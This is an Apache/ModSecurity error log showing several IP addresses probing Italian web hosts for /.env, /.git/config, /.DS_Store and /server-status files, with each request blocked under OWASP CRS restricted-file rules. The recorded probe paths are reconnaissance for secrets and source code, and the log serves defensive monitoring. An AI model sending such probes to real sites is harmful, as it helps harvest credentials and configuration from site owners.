[Sun Oct 26 14:48:31.055848 2025] [:error] [pid 3782249] [client 142.93.0.66:44664] [client 142.93.0.66] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP4mr_z8PiK8ZZRtgJZt9wAAAAU"]
[Sun Oct 26 14:48:31.056127 2025] [:error] [pid 3782249] [client 142.93.0.66:44664] [client 142.93.0.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP4mr_z8PiK8ZZRtgJZt9wAAAAU"]
[Sun Oct 26 14:48:31.056313 2025] [:error] [pid 3782249] [client 142.93.0.66:44664] [client 142.93.0.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP4mr_z8PiK8ZZRtgJZt9wAAAAU"]
[Sun Oct 26 14:48:31.342801 2025] [:error] [pid 3782250] [client 142.93.0.66:44674] [client 142.93.0.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP4mr6yHPG68w88hzzzcfAAAAAY"]
[Sun Oct 26 14:48:31.343056 2025] [:error] [pid 3782250] [client 142.93.0.66:44674] [client 142.93.0.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP4mr6yHPG68w88hzzzcfAAAAAY"]
[Sun Oct 26 14:48:31.343241 2025] [:error] [pid 3782250] [client 142.93.0.66:44674] [client 142.93.0.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP4mr6yHPG68w88hzzzcfAAAAAY"]
[Sun Oct 26 14:48:31.635895 2025] [:error] [pid 3781354] [client 142.93.0.66:44680] [client 142.93.0.66] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP4mr3wd58IofSK5itHqawAAABc"]
[Sun Oct 26 14:48:31.636122 2025] [:error] [pid 3781354] [client 142.93.0.66:44680] [client 142.93.0.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP4mr3wd58IofSK5itHqawAAABc"]
[Sun Oct 26 14:48:31.636329 2025] [:error] [pid 3781354] [client 142.93.0.66:44680] [client 142.93.0.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP4mr3wd58IofSK5itHqawAAABc"]
[Sun Oct 26 16:32:43.761612 2025] [authz_core:error] [pid 3783749] [client 157.230.19.140:45412] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Oct 26 16:32:44.615358 2025] [:error] [pid 3781355] [client 157.230.19.140:38362] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP4_HBsSKS-Gi5Csu3YKnwAAABg"]
[Sun Oct 26 16:32:44.615555 2025] [:error] [pid 3781355] [client 157.230.19.140:38362] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP4_HBsSKS-Gi5Csu3YKnwAAABg"]
[Sun Oct 26 16:32:44.615708 2025] [:error] [pid 3781355] [client 157.230.19.140:38362] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aP4_HBsSKS-Gi5Csu3YKnwAAABg"]
[Sun Oct 26 16:32:44.689744 2025] [:error] [pid 3782250] [client 157.230.19.140:38370] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP4_HKyHPG68w88hzzzcjAAAAAY"]
[Sun Oct 26 16:32:44.689998 2025] [:error] [pid 3782250] [client 157.230.19.140:38370] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP4_HKyHPG68w88hzzzcjAAAAAY"]
[Sun Oct 26 16:32:44.690175 2025] [:error] [pid 3782250] [client 157.230.19.140:38370] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aP4_HKyHPG68w88hzzzcjAAAAAY"]
[Sun Oct 26 16:32:44.749765 2025] [:error] [pid 3781355] [client 157.230.19.140:38378] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP4_HBsSKS-Gi5Csu3YKoAAAABg"]
[Sun Oct 26 16:32:44.749977 2025] [:error] [pid 3781355] [client 157.230.19.140:38378] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP4_HBsSKS-Gi5Csu3YKoAAAABg"]
[Sun Oct 26 16:32:44.750140 2025] [:error] [pid 3781355] [client 157.230.19.140:38378] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aP4_HBsSKS-Gi5Csu3YKoAAAABg"]
[Mon Oct 27 01:01:46.901884 2025] [authz_core:error] [pid 3790626] [client 206.189.2.13:52430] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Oct 27 01:01:47.493293 2025] [:error] [pid 3791562] [client 206.189.2.13:52458] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aP62aw4ljWJlHuO2htxLcQAAAAQ"]
[Mon Oct 27 01:01:47.493578 2025] [:error] [pid 3791562] [client 206.189.2.13:52458] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aP62aw4ljWJlHuO2htxLcQAAAAQ"]
[Mon Oct 27 01:01:47.493777 2025] [:error] [pid 3791562] [client 206.189.2.13:52458] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aP62aw4ljWJlHuO2htxLcQAAAAQ"]
[Mon Oct 27 01:01:47.598117 2025] [:error] [pid 3790625] [client 206.189.2.13:52472] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aP62a9mmtubzYJQyjekebAAAABQ"]
[Mon Oct 27 01:01:47.598325 2025] [:error] [pid 3790625] [client 206.189.2.13:52472] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aP62a9mmtubzYJQyjekebAAAABQ"]
[Mon Oct 27 01:01:47.598500 2025] [:error] [pid 3790625] [client 206.189.2.13:52472] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aP62a9mmtubzYJQyjekebAAAABQ"]
[Mon Oct 27 01:01:47.805414 2025] [:error] [pid 3790866] [client 206.189.2.13:52476] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aP62a7UY-leZi4ZdlW4wVwAAAAA"]
[Mon Oct 27 01:01:47.805643 2025] [:error] [pid 3790866] [client 206.189.2.13:52476] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aP62a7UY-leZi4ZdlW4wVwAAAAA"]
[Mon Oct 27 01:01:47.805805 2025] [:error] [pid 3790866] [client 206.189.2.13:52476] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aP62a7UY-leZi4ZdlW4wVwAAAAA"]
[Mon Oct 27 01:02:10.662548 2025] [authz_core:error] [pid 3791563] [client 139.59.231.238:58042] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Oct 27 01:02:13.826632 2025] [:error] [pid 3791564] [client 139.59.231.238:58070] [client 139.59.231.238] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aP62hY3VNJFuG_0MYBqckAAAAAc"]
[Mon Oct 27 01:02:13.826888 2025] [:error] [pid 3791564] [client 139.59.231.238:58070] [client 139.59.231.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aP62hY3VNJFuG_0MYBqckAAAAAc"]
[Mon Oct 27 01:02:13.827053 2025] [:error] [pid 3791564] [client 139.59.231.238:58070] [client 139.59.231.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aP62hY3VNJFuG_0MYBqckAAAAAc"]
[Mon Oct 27 01:02:14.835616 2025] [:error] [pid 3790626] [client 139.59.231.238:58074] [client 139.59.231.238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aP62hqcx3K6HlKj0yIOAkQAAAAI"]
[Mon Oct 27 01:02:14.835834 2025] [:error] [pid 3790626] [client 139.59.231.238:58074] [client 139.59.231.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aP62hqcx3K6HlKj0yIOAkQAAAAI"]
[Mon Oct 27 01:02:14.836012 2025] [:error] [pid 3790626] [client 139.59.231.238:58074] [client 139.59.231.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aP62hqcx3K6HlKj0yIOAkQAAAAI"]
[Mon Oct 27 01:02:15.828868 2025] [:error] [pid 3790625] [client 139.59.231.238:58088] [client 139.59.231.238] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aP62h9mmtubzYJQyjekebwAAABQ"]
[Mon Oct 27 01:02:15.829079 2025] [:error] [pid 3790625] [client 139.59.231.238:58088] [client 139.59.231.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aP62h9mmtubzYJQyjekebwAAABQ"]
[Mon Oct 27 01:02:15.829242 2025] [:error] [pid 3790625] [client 139.59.231.238:58088] [client 139.59.231.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aP62h9mmtubzYJQyjekebwAAABQ"]
[Tue Oct 28 16:05:20.325118 2025] [authz_core:error] [pid 3820000] [client 157.230.19.140:34136] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Oct 28 16:05:21.016222 2025] [:error] [pid 3819779] [client 157.230.19.140:34170] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQDbsR4Fxk7mjz8REGmzrgAAAAE"]
[Tue Oct 28 16:05:21.016436 2025] [:error] [pid 3819779] [client 157.230.19.140:34170] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQDbsR4Fxk7mjz8REGmzrgAAAAE"]
[Tue Oct 28 16:05:21.016602 2025] [:error] [pid 3819779] [client 157.230.19.140:34170] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQDbsR4Fxk7mjz8REGmzrgAAAAE"]
